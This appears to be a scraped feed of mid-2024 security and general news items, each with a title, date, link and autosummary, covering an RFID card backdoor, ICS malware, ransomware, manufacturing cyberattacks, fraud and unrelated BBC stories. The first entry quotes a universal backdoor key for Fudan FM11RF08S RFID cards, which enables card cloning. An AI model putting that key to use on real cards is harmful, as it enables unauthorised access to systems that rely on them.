  Autosummary: A backdoor in millions of Shanghai Fudan Microelectronics RFID cards allows cloning Pierluigi Paganini August 21, 2024 August 21, 2024 A flaw in millions of RFID cards manufactured by Shanghai Fudan Microelectronics allows these contactless cards to be cloned instantly. A396EFA4E24F (Listing 9: FM11RF08S universal backdoor key) “Tests show that once authenticated, we can read all user blocks, even if the trailer block access rights indicate that data blocks are not readable. "

  ---

  Trinidad and Tobago refloats mystery oil spill tanker

  industry
  2024-08-21 https://www.bbc.com/news/articles/c5y52r5568vo
  Some 50,000 barrels of oil have leaked since the ship overturned off the Caribbean nation"s coast in February. "

  Autosummary: "

  ---

  Microchip Technology manufacturing facilities impacted by cyberattack

  industry ciber
  2024-08-21 https://www.helpnetsecurity.com/2024/08/21/microchip-technology-cyberattack/
  

  American semiconductor manufacturer Microchip Technology Incorporated has had some of its business operations disrupted by a cyberattack. “As a result of the incident, certain of the Company’s manufacturing facilities are operating at less than normal levels, and the Company’s ability to fulfill orders is currently impacted,” the company revealed in a SEC filing on Tuesday. What is known about the cyberattack? Microchip Technology detected potentially suspicious activity involving its IT systems on August 17, 2024. … More →

  The post Microchip Technology manufacturing facilities impacted by cyberattack appeared first on Help Net Security.

  "

  Autosummary: Its products are used by companies in a variety of industries, including automotive, communications, computing, medical, aerospace and defense. "

  ---

  Organizations turn to biometrics to counter deepfakes

  industry
  2024-08-20 https://www.helpnetsecurity.com/2024/08/20/deepfakes-threat/
  

  The risk of deepfakes is rising with 47% of organizations having encountered a deepfake and 70% of them believing deepfake attacks which are created using generative AI tools, will have a high impact on their organizations, according to iProov. Perceptions of AI are hopeful as 68% of organizations believe that while it’s impactful at creating cybersecurity threats, 84% find it’s instrumental in protecting against them. This is according to a new global survey of technology … More →

  The post Organizations turn to biometrics to counter deepfakes appeared first on Help Net Security.

  "

  Autosummary: Unsurprisingly, deepfakes are now tied for third place amongst the most prevalent concerns for survey respondents with the following order: password breaches (64%), ransomware (63%), phishing/social engineering attacks (61%), and deepfakes (61%) .APAC (81%), European (72%), and North American (71%) organizations are significantly more likely than LATAM organizations (54%) to believe deepfake attacks will have an impact on their organization. "

  ---

  Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics

  industry
  2024-08-16 https://thehackernews.com/2024/08/multi-stage-valleyrat-targets-chinese.html
  Chinese-speaking users are the target of an ongoing campaign that distributes malware known as ValleyRAT. "ValleyRAT is a multi-stage malware that utilizes diverse techniques to monitor and control its victims and deploy arbitrary plugins to cause further damage," Fortinet FortiGuard Labs researchers Eduardo Altares and Joie Salvio said. "Another noteworthy characteristic of this malware is its "

  Autosummary: The attack sequence is a multi-stage process that starts with a first-stage loader that impersonates legitimate applications like Microsoft Office to make them appear harmless (e.g., "工商年报大师.exe" or "补单对接更新记录txt.exe"). "

  ---

  Key metrics for monitoring and improving ZTNA implementations

  industry
  2024-08-13 https://www.helpnetsecurity.com/2024/08/13/dean-hamilton-wilson-perumal-company-ztna-implementation/
  

  In this Help Net Security interview, Dean Hamilton, CTO at Wilson Perumal & Company, discusses the complexities of zero trust network access (ZTNA) implementation, focusing on balancing security with operational efficiency. Hamilton highlights strategic planning, collaboration between IT and business leaders, adapting to emerging challenges, continuous improvement, and using metrics to assess ZTNA success and manage risks. ZTNA implementation is associated with increased IT spending and operational complexity. How can businesses strike a balance between … More →

  The post Key metrics for monitoring and improving ZTNA implementations appeared first on Help Net Security.

  "

  Autosummary: Careful up-front investment in three key areas is critical to finding balance for IT and avoiding adverse impacts on the business: Enterprise Architecture (EA) management is the practice of documenting and understanding how IT resources (infrastructure, services, applications, and data) align with business objectives, organizational elements, and business processes.While some of that spending is associated with licenses for enablement technologies that provide granular network segmentation, policy management, policy enforcement, device assessment, etc., the majority of the increased cost comes from the operational overhead required to define and maintain granular network and application access policies that are calibrated to the specific needs of each business. Rate of valid business user trouble tickets requiring policy modification Time to resolve business user policy-related tickets Time to detect policy misconfiguration Time to resolve policy misconfiguration Engagement of non-IT end-users in policy updates Cybersecurity literacy of executives and business leaders What new challenges and opportunities should organizations anticipate as they refine their ZTNA strategies? "

  ---

  Industrial Remote Access Tool Ewon Cosy+ Vulnerable to Root Access Attacks

  industry
  2024-08-12 https://thehackernews.com/2024/08/industrial-remote-access-tool-ewon-cosy.html
  Security vulnerabilities have been disclosed in the industrial remote access solution Ewon Cosy+ that could be abused to gain root privileges to the devices and stage follow-on attacks. The elevated access could then be weaponized to decrypt encrypted firmware files and encrypted data such as passwords in configuration files, and even get correctly signed X.509 VPN certificates for foreign "

  Autosummary: "An unauthenticated attacker can gain root access to the Cosy+ by combining the found vulnerabilities and e.g., waiting for an admin user to log in to the device," Abrell said. "

  ---

  Musk shares faked far-right "detainment camp" for rioters post

  industry
  2024-08-08 https://www.bbc.com/news/articles/cp35w0kj2y4o
  The image was faked to look like it had come from the Daily Telegraph website. "

  Autosummary: "

  ---

  Take action now over riot posts, social media firms told

  industry
  2024-08-08 https://www.bbc.com/news/articles/c2076n7w4qlo
  The government and the media regulator have faced criticism for not intervening sooner. "

  Autosummary: "

  ---

  OpenWrt dominates, but vulnerabilities persist in OT/IoT router firmware

  industry
  2024-08-07 https://www.helpnetsecurity.com/2024/08/07/ot-iot-router-firmware-vulnerabilities/
  

  Forescout has published a new report examining the current state of the software supply chain in OT/IoT routers. The study uncovered that OT and IoT cellular routers and those used in small offices and homes contain outdated software components associated with known (“n-day”) vulnerabilities. The research showed that widely used OT/IoT router firmware images have, on average, 20 exploitable n-day vulnerabilities affecting the kernel, leading to increasing security risks. Number of historical vulnerabilities by CVSS … More →

  The post OpenWrt dominates, but vulnerabilities persist in OT/IoT router firmware appeared first on Help Net Security.

  "

  Autosummary: On average, 41% of binaries across firmware images use RELRO, 31% use stack canaries, 65% use NX, 75% use PIE, 4% use RPath, and 35% have debugging symbols.On average, 41% of binaries across firmware images use RELRO, 31% use stack canaries, 65% use NX, 75% use PIE, 4% use RPath, and 35% have debugging symbols. On average, firmware images had 161 known vulnerabilities in their most common components: 68 with a low or medium CVSS score, 69 with a high score, and 24 with a critical score. "

  ---

  The real story of the news website accused of fuelling riots

  industry
  2024-08-07 https://www.bbc.com/news/articles/c5y38gjp4ygo
  The BBC tracks down a Canadian hockey player, a dad in Pakistan and a Texan named Kevin linked to Channel3Now. "

  Autosummary: Kevin claims there are “more than 30” people in the US, UK, Pakistan and India who work for the site, usually recruited from sites for freelancers - including Farhan and James.The BBC has tracked down several people linked to Channel3Now, spoken to their friends and colleagues, who have corroborated that they are real people, and questioned a person who claims to be the “management” at the site.He says how Farhan in particular was not involved in the false Southport story, which the site has publicly apologised for, and blamed “our UK-based team”.Kevin says he is speaking to me from the site’s “main office” in the US - which fits with both the timings of the social media posts on some of the site"s social media profiles, and the times Kevin replies to my emails. "

  ---

  Venezuela"s economy runs on oil - and music

  industry
  2024-07-28 https://www.bbc.com/news/articles/c51y9r0jgxno
  Venezuela"s battered economy is one of the key battlegrounds in Sunday"s presidential election. "

  Autosummary: Unfortunately, however, those policies have done little or nothing to tackle the economy"s underlying structural problems - chiefly, its historic dependence on oil, to the detriment of other sectors.But at the same time, they neglected to invest in maintaining the level of oil production, which has plummeted in recent years - partly, but not solely, as a result of US sanctions. "

  ---

  Terrorist Activity is Accelerating in Cyberspace – Risk Precursor to Summer Olympics and Elections

  industry
  2024-07-26 https://securityaffairs.com/166179/breaking-news/terrorist-activity-alarm-terrorist-attacks.html
  Terrorist groups are increasingly using cyberspace and digital communication channels to plan and execute attacks. Yesterday Federal Bureau of Investigation (FBI) Director Christopher Wray expressed growing concerns over the potential for a coordinated foreign terrorist attack in the United States. During his testimony to the House Oversight Committee, Mr. Wray cited the ISIS-K attack on […] "

  Autosummary: According to experts, one of the key issues is tracking high-risk individuals who may misuse financial services, such as banks, e-commerce platforms, and payment networks, to engage in illegal activities, including money laundering and terrorism financing. "

  ---

  Cybersecurity ROI: Top metrics and KPIs

  industry ciber
  2024-07-24 https://www.helpnetsecurity.com/2024/07/24/karthik-swarnam-armorcode-cybersecurity-roi/
  

  In this Help Net Security interview, Karthik Swarnam, Chief Security and Trust Officer at ArmorCode, discusses key metrics and KPIs to measure cybersecurity ROI. Swarnam shares strategies for enhancing ROI through proactive measures and effective communication with executive leadership. What are the primary metrics and KPIs used to measure the ROI of cybersecurity investments? Today, cybersecurity investments are evaluated not just for cost avoidance but for a much broader range of benefits. These metrics include: … More →

  The post Cybersecurity ROI: Top metrics and KPIs appeared first on Help Net Security.

  "

  Autosummary: To improve cybersecurity ROI, security professionals should: Establish clear metrics: Define and measure key metrics across various domains such as identity & access management, risk remediation, software development, data loss prevention, and messaging security. Define and measure key metrics across various domains such as identity & access management, risk remediation, software development, data loss prevention, and messaging security.In this Help Net Security interview, Karthik Swarnam, Chief Security and Trust Officer at ArmorCode, discusses key metrics and KPIs to measure cybersecurity ROI. Tool rationalization: By leveraging a governance layer, organizations can eliminate redundant security tools, optimizing their security investments.Traditional metrics for this measurement include the number of detected incidents, Mean Time to Detect (MTTD), Mean Time to Respond (MTTR), and patch management (average time to deploy fixes). "

  ---

  Hot topics: Can’t-miss sessions at Mandiant’s 2024 mWISE event

  industry
  2024-07-24 https://www.bleepingcomputer.com/news/security/hot-topics-cant-miss-sessions-at-mandiants-2024-mwise-event/
  Now that the mWISE 2024 session catalog is out, it"s time to take a closer look at the topics. Learn more from @mWISEConference about the three hottest tracks in this year"s conference. [...] "

  Autosummary: The Dark Side of Innovation: Generative AI in Cybercrime A look at how GenAI tools are being used in cybercrime, including phishing attacks crafted with AI-generated content, the use of deepfakes for identity fraud, and AI-driven network intrusion techniques. "

  ---

  Smashing Security podcast #382: CrowdStrike, Dark Wire, and the Paris Olympics

  industry
  2024-07-24 https://grahamcluley.com/smashing-security-podcast-382/
  Computers blue-screen-of-death around the world! The Paris Olympics is at risk of attack! And the FBI pull off the biggest sting operation in history by running a secret end-to-end encrypted messaging app! All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by industry veterans Graham Cluley and … Continue reading "Smashing Security podcast #382: CrowdStrike, Dark Wire, and the Paris Olympics" "

  Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Joseph Cox – @josephfcox Episode links: Sponsored by: 1Password Extended Access Management – Secure every sign-in for every app on every device. "

  ---

  New ICS Malware "FrostyGoop" Targeting Critical Infrastructure

  exploits industry
  2024-07-23 https://thehackernews.com/2024/07/new-ics-malware-frostygoop-targeting.html
  Cybersecurity researchers have discovered what they say is the ninth Industrial Control Systems (ICS)-focused malware that has been used in a disruptive cyber attack targeting an energy company in the Ukrainian city of Lviv earlier this January. Industrial cybersecurity firm Dragos has dubbed the malware FrostyGoop, describing it as the first malware strain to directly use Modbus TCP "

  Autosummary: It"s also the ninth ICS-focused malware after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, and COSMICENERGY. "

  ---

  FrostyGoop ICS malware targets Ukraine

  exploits industry
  2024-07-23 https://securityaffairs.com/166087/malware/frostygoop-ics-malware-modbus.html
  In April 2024, Dragos researchers spotted the malware FrostyGoop that interacts with Industrial Control Systems (ICS) using the Modbus protocol. In April 2024, Dragos researchers discovered a new ICS malware named FrostyGoop that interacts with Industrial Control Systems using the Modbus protocol. FrostyGoop is the ninth ICS malware that was discovered an that a nation-state […] "

  Autosummary: FrostyGoop ICS malware targets Ukraine Pierluigi Paganini July 23, 2024 July 23, 2024 In April 2024, Dragos researchers spotted the malware FrostyGoop that interacts with Industrial Control Systems (ICS) using the Modbus protocol. "

  ---

  Cross-industry standards for data provenance in AI

  industry
  2024-07-22 https://www.helpnetsecurity.com/2024/07/22/saira-jesani-data-trust-alliance-data-provenance-standards/
  

  In this Help Net Security interview, Saira Jesani, Executive Director of the Data & Trust Alliance, discusses the role of data provenance in AI trustworthiness and its impact on AI models’ performance and reliability. Jesani highlights the collaborative process behind developing cross-industry metadata standards to address widespread data provenance challenges and ensure applicability across various sectors. Can you explain why data provenance is critical for AI trustworthiness and how it impacts AI models’ overall performance … More →

  The post Cross-industry standards for data provenance in AI appeared first on Help Net Security.

  "

  Autosummary: This diverse group of contributors with functions including chief technology officers, chief data officers, and leaders in data governance, data acquisition, data quality, privacy, legal, and compliance ensured that the standards address common challenges and needs across multiple industries.They included American Express, Humana, IBM, Mastercard, Nielsen, Pfizer, UPS, and Walmart.As AI systems become more integrated into various sectors, the adoption of these standards can help ensure that data used in AI applications is reliable and legally compliant, thereby mitigating risks related to privacy, copyright, and brand protection. "

  ---

  Ten footballers to watch out for at Paris Olympics

  industry
  2024-07-22 https://www.bbc.com/sport/football/articles/cek91m98g48o
  From Manchester City"s Julian Alvarez to Brazil icon Marta, BBC Sport picks out 10 footballers to watch at the Olympics. "

  Autosummary: "

  ---

  Automated Threats Pose Increasing Risk to the Travel Industry

  industry
  2024-07-18 https://thehackernews.com/2024/07/automated-threats-pose-increasing-risk.html
  As the travel industry rebounds post-pandemic, it is increasingly targeted by automated threats, with the sector experiencing nearly 21% of all bot attack requests last year. That’s according to research from Imperva, a Thales company. In their 2024 Bad Bot Report, Imperva finds that bad bots accounted for 44.5% of the industry’s web traffic in 2023—a significant jump from 37.4% in 2022.  "

  Autosummary: Time-sensitive, high-value travel transactions enable quick monetization, often before fraud is detected, resulting in financial losses, damaged customer trust, and harm to the company"s reputation.Therefore, Imperva advocates for layered defenses, including user behavior analysis, profiling, and fingerprinting, as essential measures for the travel industry. Imperva suggests several quick wins, such as blocking outdated browser versions, restricting access from bulk IP data centers, and implementing detection strategies for signs of automation, like unusually fast interactions.These are some of the most common ways travel-related applications are targeted daily: Fare Scraping: The use of bots to aggregate pricing information, inventories, discounted fares, and more. "

  ---

  Is Brazil"s Brics-building worth it?

  latam industry
  2024-07-14 https://www.bbc.com/news/articles/c0venrydg8yo
  The Brazilian president sees the Brics as a way to remake the world - but it is dominated by China. "

  Autosummary: In that time, President Lula"s comeback has given renewed force to one of the world"s most unlikely economic alliances - the Brics, a grouping that unites Brazil with Russia, India, China and South Africa. 4 days ago By Robert Plummer , BBC News Share Getty Images Lula"s Brazil is keen to promote the Brics, but it is dwarfed by Xi Jinping"s China It"s been more than a year-and-a-half since Brazil"s Luiz Inácio Lula da Silva returned to the country"s presidency, back from the political dead after his conviction on corruption charges was dramatically annulled.Rodrigo Zeidan, a Brazilian economist based at China"s New York University Shanghai, tells the BBC that Brazil and China alike see the Brics as a "hedge" in terms of global alliances, rather than as a top priority. "

  ---

  Ever Wonder How Hackers Really Steal Passwords? Discover Their Tactics in This Webinar

  industry
  2024-07-12 https://thehackernews.com/2024/07/ever-wonder-how-hackers-really-steal.html
  In today"s digital age, passwords serve as the keys to our most sensitive information, from social media accounts to banking and business systems. This immense power brings with it significant responsibility—and vulnerability. Most people don"t realize their credentials have been compromised until the damage is done. Imagine waking up to drained bank accounts, stolen identities, or a company"s "

  Autosummary: " What You"ll Learn: In this webinar, Tim Chase will delve into the world of compromised credentials, covering: The Anatomy of an Attack : Understand how attackers steal and exploit credentials through phishing and brute force. "

  ---

  Ticket Heist fraud gang uses 700 domains to sell fake Olympics tickets

  industry
  2024-07-10 https://www.bleepingcomputer.com/news/security/ticket-heist-fraud-gang-uses-700-domains-to-sell-fake-olympics-tickets/
  A large-scale fraud campaign with over 700 domain names is likely targeting Russian-speaking users looking to purchase tickets for the Summer Olympics in Paris. [...] "

  Autosummary: Ticket Heist website for UEFA EURO 24 Championship source: QuoIntelligence Additionally, the researchers discovered websites in this fraudulent activity that claimed to sell tickets to music concerts featuring famous bands like Twenty One Pilots, Iron Maiden, Metallica, Rammstein, and musicians (Bruno Mars, Ludovico Einaudi). “For example, a random event and seat location on the official website could cost less than EUR 100, whereas the same tickets and locations on the fraudulent websites were priced at a minimum of EUR 300, often reaching EUR 1,000” - QuoIntelligence QuoIntelligence threat researcher Andrei Moldovan told BleepingComputer that while there is no confirmation, the higher prices could be part of a trick to make victims believe they get “premium treatment” for the extra money since the tickets are not available through the official distribution channels. "

  ---

  Understanding IoT security risks and how to mitigate them | Cybersecurity podcast

  industry ciber
  2024-07-10 https://www.welivesecurity.com/en/videos/understanding-iot-security-risks-mitigate-cybersecurity-podcast/
  As security challenges loom large on the IoT landscape, how can we effectively counter the risks of integrating our physical and digital worlds? "

  Autosummary: "

  ---

  Align strengthens defense against double-extortion ransomware tactics

  exploits ransomware industry
  2024-07-09 https://www.helpnetsecurity.com/2024/07/09/align-exfiltration-prevention-feature/
  

  Align adds a new exfiltration prevention feature to its Align Guardian Managed Detection and Response offering, powered by Adlumin. This innovation is designed to detect and stop attackers from exfiltrating data, providing a defense against modern ransomware tactics that employ double-extortion techniques. The new ransomware and exfiltration prevention feature complements Guardian’s existing ransomware prevention capabilities, which already stop ransomware encryption fast enough to save 99% of files. This comprehensive approach now protects organizations from both … More →

  The post Align strengthens defense against double-extortion ransomware tactics appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  99% of IoT exploitation attempts rely on previously known CVEs

  exploits industry
  2024-07-05 https://www.helpnetsecurity.com/2024/07/05/iot-security-privacy-challenges/
  

  The explosion of Internet of Things (IoT) devices has brought about a wide range of security and privacy challenges, according to Bitdefender and NETGEAR. The report is based on global telemetry of 3.8 million homes and 50 million IoT devices that generated 9.1 billion security events over the course of 12 months. High vulnerabilities found in TVs, smart plugs, DVRs With over 15 billion connected devices globally, from smart home appliances to industrial equipment, the … More →

  The post 99% of IoT exploitation attempts rely on previously known CVEs appeared first on Help Net Security.

  "

  Autosummary: Across all device types, denial of service (DoS) attacks appear to be the most common type of vulnerability, with significant percentages observed for TV sets (36.7%), smart plugs (22.2%), DVRs (17.7%), routers (13.4%), and set-top boxes (6.9%). "

  ---

  Google Pixel 6 series phones bricked after factory reset

  industry
  2024-07-02 https://www.bleepingcomputer.com/news/google/google-pixel-6-series-phones-bricked-after-factory-reset/
  Multiple owners of Google Pixel 6 series phones (6, 6a, 6 Pro) have been reporting in the past week that their devices were "bricked" after they performed a factory reset. [...] "

  Autosummary: Until the situation clears up, Google Pixel 6, 6a, and 6 Pro owners should not perform factory resets and take regular backups on a separate device. "

  ---

  Researchers Warn of Flaws in Widely Used Industrial Gas Analysis Equipment

  industry
  2024-06-28 https://thehackernews.com/2024/06/researchers-warn-of-flaws-in-widely.html
  Multiple security flaws have been disclosed in Emerson Rosemount gas chromatographs that could be exploited by malicious actors to obtain sensitive information, induce a denial-of-service (DoS) condition, and even execute arbitrary commands. The flaws impact GC370XA, GC700XA, and GC1500XA and reside in versions 4.1.5 and prior. According to operational technology (OT) security firm Claroty, the "

  Autosummary: "

  ---

  India reviews iPhone factory for "not hiring married women"

  industry
  2024-06-27 https://www.bbc.com/news/articles/cydvp336y3no
  The firm has come under the scanner for allegedly not employing married women at its factory in Tamil Nadu state. "

  Autosummary: "

  ---

  Exploding batteries spark deadly S Korea factory fire

  industry
  2024-06-24 https://www.bbc.com/news/articles/crgggmeyjj7o
  At least 22 people have been confirmed dead while eight others were injured, local authorities say. "

  Autosummary: Whatever the cause, once the fire took hold, it would have spread at speed - giving the workers little time to escape, according to Kim Jae-ho, fire and disaster prevention professor at Daejeon University. "

  ---

  Crown Equipment cyberattack confirmed, manufacturing disrupted for weeks

  industry ciber
  2024-06-20 https://www.helpnetsecurity.com/2024/06/20/crown-equipment-cyberattack/
  

  Ohio-based Crown Equipment, which is among the largest industrial and forklift truck manufacturers in the world, has become a victim of a cyberattack “by an international cybercriminal organization,” the company has finally confirmed to its employees on Tuesday. The confirmation came nine days after the company’s network went down (on June 9) and eight days after its manufacturing plants came to a standstill (on June 10), as reported as reported by German security blogger Günter … More →

  The post Crown Equipment cyberattack confirmed, manufacturing disrupted for weeks appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  CosmicSting flaw impacts 75% of Adobe Commerce, Magento sites

  industry
  2024-06-20 https://www.bleepingcomputer.com/news/security/cosmicsting-flaw-impacts-75-percent-of-adobe-commerce-magento-sites/
  A vulnerability dubbed "CosmicSting" impacting Adobe Commerce and Magento websites remains largely unpatched nine days after the security update has been made available, leaving millions of sites open to catastrophic attacks. [...] "

  Autosummary: " Apply fix or mitigation now The vendor released fixes for CVE-2024-34102 with the following versions, which e-commerce platform administrators are recommended to apply as soon as possible: Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Extended Support 2.4.3-ext-8, 2.4.2-ext-8, 2.4.1-ext-8, 2.4.0-ext-8, 2.3.7-p4-ext-8 Magento Open Source 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Webhooks Plugin version 1.5.0 Sansec recommends that site admins switch to "Report-Only" mode before upgrading to avoid an issue that may break checkout functionality. "

  ---

  UNC3886 Uses Fortinet, VMware 0-Days and Stealth Tactics in Long-Term Spying

  industry
  2024-06-19 https://thehackernews.com/2024/06/chinese-cyber-espionage-group-exploits.html
  The China-nexus cyber espionage actor linked to the zero-day exploitation of security flaws in Fortinet, Ivanti, and VMware devices has been observed utilizing multiple persistence mechanisms in order to maintain unfettered access to compromised environments. "Persistence mechanisms encompassed network devices, hypervisors, and virtual machines, ensuring alternative channels remain available "

  Autosummary: " Some of the other malware families delivered during the course of attacks aimed at VMware instances are below - A trojanized version of a legitimate TACACS daemon with credential-logging functionality VIRTUALSHINE, a VMware VMCI sockets-based backdoor that provides access to a bash shell VIRTUALPIE, a Python backdoor that supports file transfer, arbitrary command execution, and reverse shell capabilities VIRTUALSPHERE, a controller module associated with a VMCI-based backdoor Over the years, virtual machines have become lucrative targets for threat actors owing to their widespread use in cloud environments. "

  ---

  Crown Equipment confirms a cyberattack disrupted manufacturing

  industry ciber
  2024-06-19 https://www.bleepingcomputer.com/news/security/crown-equipment-confirms-a-cyberattack-disrupted-manufacturing/
  Forklift manufacturer Crown Equipment confirmed today that it suffered a cyberattack earlier this month that disrupted manufacturing at its plants. [...] "

  Autosummary: With IT systems down, employees have been unable to clock in their hours, access service manuals, and, we are told, deliver machinery in some cases. "

  ---

  The Financial Dynamics Behind Ransomware Attacks

  financial exploits ransomware industry
  2024-06-18 https://securityaffairs.com/164636/cyber-crime/financial-dynamics-ransomware-attacks.html
  Over the last few years, ransomware attacks have become one of the most prevalent and expensive forms of cybercrime. Initially, these attacks involved malicious software that encrypts a victim’s data, rendering it inaccessible until a ransom is paid to the attackers. Today, this tactic has evolved, where ransomware operators in nearly every case first exfiltrate […] "

  Autosummary: A multi-pronged approach, including strengthening cyber defenses, improving regulations, and raising awareness, is crucial to mitigating the risk and impact of ransomware.Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre.Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications. "

  ---

  Argus Cyber Security and Microsoft partner to secure automotive fleets throughout the vehicle lifecycle

  industry
  2024-06-17 https://www.helpnetsecurity.com/2024/06/17/argus-cyber-security-microsoft-collaboration/
  

  Argus Cyber Security is collaborating with Microsoft to build a next generation, end-to-end platform for automotive and mobility security. This Argus Vehicle Security Platform consists of two integrated solutions that combine Argus’ automotive cybersecurity portfolio with robust software development and security products from Microsoft, one of the world’s most innovative technology companies and a leader in GenAI. In recent years, vehicle manufacturers have come to realize the importance of Software Defined Vehicles (SDV) and integrating … More →

  The post Argus Cyber Security and Microsoft partner to secure automotive fleets throughout the vehicle lifecycle appeared first on Help Net Security.

  "

  Autosummary: The second solution, known as “Automotive Security Lifecycle Management,” integrates the Argus XDR threat detection and response product for automotive on Azure with robust security operations and management tools from Microsoft, including Microsoft Sentinel, Defender for Cloud, Defender Threat Intelligence and Azure OpenAI Service. "

  ---

  Preventative defense tactics in the real world

  industry
  2024-06-17 https://www.welivesecurity.com/en/business-security/preventative-defense-tactics-real-world/
  Don’t get hacked in the first place – it costs far less than dealing with the aftermath of a successful attack "

  Autosummary: MFA can stop, or at least blunt, brute force attacks, especially Business Email Compromise (BEC), which is a perpetual concern. "

  ---

  North Korean Hackers Target Brazilian Fintech with Sophisticated Phishing Tactics

  financial latam industry
  2024-06-14 https://thehackernews.com/2024/06/north-korean-hackers-target-brazilian.html
  Threat actors linked to North Korea have accounted for one-third of all the phishing activity targeting Brazil since 2020, as the country"s emergence as an influential power has drawn the attention of cyber espionage groups. "North Korean government-backed actors have targeted the Brazilian government and Brazil"s aerospace, technology, and financial services sectors," Google"s Mandiant and "

  Autosummary: "Jade Sleet"s packages, discovered throughout summer 2023, were designed to work in pairs, with each pair being published by a separate npm user account to distribute their malicious functionality," Checkmarx researchers Tzachi Zornstein and Yehuda Gelb said. "

  ---

  Learn to Secure Petabyte-Scale Data in a Webinar with Industry Titans

  industry
  2024-06-14 https://thehackernews.com/2024/06/learn-to-secure-petabyte-scale-data-in.html
  Data is growing faster than ever. Remember when petabytes (that"s 1,000,000 gigabytes!) were only for tech giants? Well, that"s so last decade! Today, businesses of all sizes are swimming in petabytes. But this isn"t just about storage anymore. This data is ALIVE—it"s constantly accessed, analyzed, shared, and even used to train the next wave of AI. This creates a huge challenge: how do you "

  Autosummary: In this must-attend webinar, you"ll learn: How to adapt your data security strategies to keep pace with explosive data growth Best practices for managing access control and monitoring in petabyte-scale environments Strategies for mitigating risks associated with third-party data access and data movement Insights into the unique security challenges posed by LLM model training Future-proofing your data security approach for the era of big data Whether you"re a CISO, security engineer, IT professional, or business leader, if you"re responsible for protecting your company"s data, this webinar is essential. "

  ---

  Preparing for a career in cybersecurity? Check out these statistics

  industry ciber
  2024-06-11 https://www.helpnetsecurity.com/2024/06/11/cybersecurity-jobs-skills-statistics-2024/
  

  This article includes excerpts from various reports that provide statistics and insights on cybersecurity jobs, skills shortages, and workforce dynamics. Lack of skills and budget slow zero-trust implementation Entrust | 2024 State of Zero Trust & Encryption Study | May 2024 Despite 60% of organizations reporting significant senior leadership support for zero trust, a lack of skills and budget are still cited as the biggest roadblocks to implementing these frameworks, highlighting a discrepancy between support … More →

  The post Preparing for a career in cybersecurity? Check out these statistics appeared first on Help Net Security.

  "

  Autosummary: IDC | Enterprise Resilience: IT Skilling Strategies, 2024 | May 2024 IDC predicts that by 2026, more than 90% of organizations worldwide will feel the pain of the IT skills crisis, amounting to some $5.5 trillion in losses caused by product delays, impaired competitiveness, and loss of business. "

  ---

  China-Linked ValleyRAT Malware Resurfaces with Advanced Data Theft Tactics

  exploits industry
  2024-06-11 https://thehackernews.com/2024/06/china-linked-valleyrat-malware.html
  Cybersecurity researchers have uncovered an updated version of malware called ValleyRAT that"s being distributed as part of a new campaign. "In the latest version, ValleyRAT introduced new commands, such as capturing screenshots, process filtering, forced shutdown, and clearing Windows event logs," Zscaler ThreatLabz researchers Muhammed Irfan V A and Manisha Ramcharan Prajapati said. ValleyRAT "

  Autosummary: Next, the malware launches "WINWORD2013.EXE," a legitimate executable associated with Microsoft Word, using it to sideload "wwlib.dll" that, in turn, establishes persistence on the system and loads "xig.ppt" into memory. "

  ---

  Sticky Werewolf targets the aviation industry in Russia and Belarus

  industry
  2024-06-10 https://securityaffairs.com/164345/hacking/sticky-werewolf-targets-aviation-industry.html
  Morphisec researchers observed a threat actor, tracked as Sticky Werewolf, targeting entities in Russia and Belarus. Sticky Werewolf is a threat actor that was first spotted in April 2023, initially targeting public organizations in Russia and Belarus. The group has expanded its operations to various sectors, including a pharmaceutical company and a Russian research institute […] "

  Autosummary: Sticky Werewolf targets the aviation industry in Russia and Belarus Pierluigi Paganini June 10, 2024 June 10, 2024 Morphisec researchers observed a threat actor, tracked as Sticky Werewolf, targeting entities in Russia and Belarus. "

  ---

  APT and financial attacks on industrial organizations in Q1 2024

  financial industry
  2024-06-10 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-q1-2024/
  This summary provides an overview of the reports of APT and financial attacks on industrial enterprises, as well as the related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities. "

  Autosummary: According to the CSA, these operations have targeted various industries, including aerospace and defense, education, energy and utilities, governments, hospitality, manufacturing, oil and gas, retail, technology, and transportation.Targeted countries include the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, the United Arab Emirates, and the US.According to them, victims are globally distributed, vary greatly in size and span multiple industries, including: global government and military departments, national telecommunications companies, defense contractors, aerospace, aviation, engineering, and others. Pawn Storm/Sofacy/APT28 attacks TrendMicro reported that Pawn Storm (aka APT28, Sofacy, Fancy Bear, Sednit, and Forest Blizzard) launched NTLMv2 hash relay attacks between April 2022 and November 2023 to brute-force its way into government, defense, military, energy and transportation networks worldwide. StrelaStealer attacks Palo Alto Networks researchers identified a wave of large-scale StrelaStealer campaigns that impacted more than 100 organizations in the EU and US, including manufacturing, utilities and energy, construction, high tech, and other industries.Some of the devices and software compromised by the attackers include Fortinet FortiGuard, PRTG Network Monitor appliances, ManageEngine ADSelfService Plus, FatePipe WARP, Ivanti Connect Secure VPN, and Cisco ASA, according to the Dragos report.So far, RedCurl has carried out more than 40 attacks: half of them in Russia, the rest in the UK, Germany, Canada, Norway, and Ukraine. Volt Typhoon CISA alert The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) published a joint guidance and advisory on February 7 focusing on the Chinese-speaking threat actor, Volt Typhoon, which infiltrated a critical infrastructure network in the United States and remained undetected for at least five years before being discovered. Attackers send phishing emails in the name of domestic government agencies (Roskomnadzor, Investigative Committee, Military Prosecutor’s Office, court orders, and other regulatory requirements) and trick recipients into launching a malicious file, after which they deliver the White Snake stealer to the victim’s computer. "

  ---

  Brazil to ask Argentina to extradite alleged rioters

  latam industry
  2024-06-08 https://www.bbc.com/news/articles/c2vv504qj13o
  The riots were led by supporters of former right-wing President Jair Bolsonaro in January 2023. "

  Autosummary: "

  ---

